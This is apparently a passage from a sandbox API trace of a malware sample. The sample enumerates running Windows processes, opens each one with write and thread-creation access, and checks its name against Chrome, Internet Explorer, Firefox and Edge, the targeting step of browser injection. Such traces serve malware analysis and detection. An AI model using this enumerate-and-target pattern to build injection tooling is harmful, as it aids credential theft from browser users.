	[0210.091] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0210.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x35f4
	[0210.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.092] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0210.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.092] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.093] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0210.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.093] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.093] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0210.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x35f8
	[0210.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.094] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0210.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.094] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.095] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0210.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.095] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.095] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0210.096] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x35fc
	[0210.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.096] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0210.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.096] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.097] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0210.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.097] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.097] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0210.098] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3600
	[0210.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.098] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0210.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.098] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.099] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0210.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.099] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.099] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.100] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3604
	[0210.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.100] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.100] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.101] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.101] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.101] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.102] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3608
	[0210.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.102] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.102] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.103] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.103] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.103] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x360c
	[0210.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.105] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.105] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.105] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.106] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.106] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.107] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3610
	[0210.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.107] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.107] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.107] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.108] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.108] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.109] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3614
	[0210.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.109] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.109] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.109] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.110] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.110] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.111] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3618
	[0210.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.111] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.111] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.111] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.112] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.112] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.113] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x361c
	[0210.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.113] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.113] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.113] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.114] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.114] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0210.115] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3620
	[0210.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.115] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0210.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.115] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.115] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0210.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.116] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.116] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.117] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3624
	[0210.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.117] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.117] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.117] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.118] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.118] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0210.119] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3628
	[0210.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.119] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.119] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.119] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.120] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.120] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0210.121] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x362c
	[0210.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.121] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0210.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.121] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.121] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0210.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.122] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.122] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.123] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3630
	[0210.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.123] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.123] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.123] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.124] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.124] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0210.125] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3634
	[0210.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.125] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0210.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.125] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.125] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0210.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.126] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.126] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0210.127] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3638
	[0210.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.127] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0210.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.127] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.127] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0210.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.128] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.128] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0210.129] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x363c
	[0210.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.129] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0210.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.129] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.129] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0210.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.129] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.130] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0210.130] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3640
	[0210.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.130] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0210.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.131] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.131] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0210.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.131] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.132] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0210.132] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0210.132] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0210.133] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3644
	[0210.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.134] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0210.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.134] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.135] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0210.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.135] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.136] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0210.136] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x3648
	[0210.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.136] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0210.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.137] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.137] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0210.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.137] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.138] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0210.138] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x364c
	[0210.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.138] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0210.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.139] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.139] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0210.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.139] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.140] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0210.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3650
	[0210.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.140] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0210.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.141] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.141] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0210.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.141] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.142] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0210.142] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3654
	[0210.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.142] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
